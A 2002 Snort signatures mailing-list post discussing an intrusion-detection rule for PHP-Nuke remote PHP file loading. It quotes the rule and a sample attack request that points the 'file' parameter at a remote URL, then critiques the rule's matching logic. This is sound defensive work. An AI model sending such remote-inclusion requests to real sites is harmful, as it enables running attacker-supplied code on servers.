[Snort-sigs] PHPNuke rule
bmc at ...95...
Fri Jan 18 22:55:01 EST 2002
On Fri, Jan 18, 2002 at 08:00:00PM +0800, Michael Boman wrote:
> alert TCP $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"PHP-Nuke remote loading
> of PHP files exploit"; uricontent:"/index.php?file=http"; nocase; dsize:
> >24; flags: A+; classtype:web-application-attack;)
> Why dsize: >24 ?
> Smallest GET request I could think of is:
> GET /?file=http://xx.xx/y
Your signature is false negative. you require "index.php" but in your example,
you use /
Also, PHP transparently handles GET/POST. since it does, you can't expect
"?file=http" in an attempt, only "file=http"
Also, does anyone know if PHP will download things via other protocols? I
suspect it will download via FTP as well, but I don't have it installed
When I get to a place where I can do a CVS commit, I'll be adding an
a modified version of this sig in experimental.rules with SID of 1399
More information about the Snort-sigs